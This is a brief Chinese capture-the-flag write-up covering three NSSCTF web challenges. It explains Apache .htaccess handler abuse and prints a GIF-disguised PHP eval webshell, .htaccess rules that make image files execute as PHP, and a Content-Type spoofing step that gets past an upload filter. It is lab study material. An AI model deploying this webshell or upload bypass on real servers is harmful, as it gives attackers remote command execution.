NSSCTF WEB 刷题

[第五空间 2021]WebFTP

以为是SQL注入，也没有找到注入点

用dirsearch扫描一下网址，发现了很多文件，

以为是git泄露，访问.git没找到可利用的文件

再访问phpinfo.php找到flag

[GXYCTF 2019]BabyUpload

.htaccess文件解析漏洞

.htaccess文件(或者”分布式配置文件”）提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。作为用户，所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

概述来说，htaccess文件是Apache服务器中的一个配置文件，它负责相关目录下的网页配置。通过htaccess文件，可以帮我们实现：网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

第一种：
AddType application/x-httpd-php .jpg
将所有后缀为.jpg的文件作为php文件解析
第二种：
<FilesMatch “BaiZe”>
setHandler application/x-httpd-phpBZ

将所有文件名包含BaiZe的文件作为php文件解析

所以此题就建一个内容为AddType application/x-httpd-php .jpg的.htaccess文件，注意直接上传是不行的要修改Content-Type: 为image/jpeg
然后再上传木马得到flag

木马文件：

GIF89a
<script language="php">eval($_POST['cmd'])</script>

.htaccess文件：

<FilesMatch "pass">
SetHandler application/x-httpd-php
</FilesMatch>

[SWPUCTF 2021 新生赛]easyupload1.0

上传一句话木马图片，连接蚁剑，发现flag.php却是假的flag，真的flag应该在环境变量里